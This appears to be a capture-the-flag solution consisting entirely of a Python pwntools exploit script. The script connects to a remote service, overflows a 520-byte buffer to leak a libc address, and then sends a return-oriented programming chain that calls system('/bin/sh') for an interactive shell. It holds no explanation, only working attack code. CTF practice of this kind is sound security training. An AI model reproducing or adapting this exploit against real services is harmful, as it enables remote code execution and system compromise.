Rating:
```
#!/usr/bin/env python3
from pwn import *
libc = ELF("./libc.so.6")
r = remote("52.59.124.14",10034)
exploit = b"\x90" * 520 + p8(0xc3)
r.send(exploit)
r.recvuntil(b"\x90" * 520)
pop_rdi = 0x27765
ret = pop_rdi + 1
leak = u64(r.recvuntil(b"\x7f").decode('latin-1').ljust(8,'\x00')) - 0x271c3
exploit = b"A" * 520 + p64(leak + pop_rdi) + p64(leak + next(libc.search(b"/bin/sh\x00"))) + p64(leak + ret) + p64(leak + libc.sym.system)
r.send(exploit)
r.interactive()
```
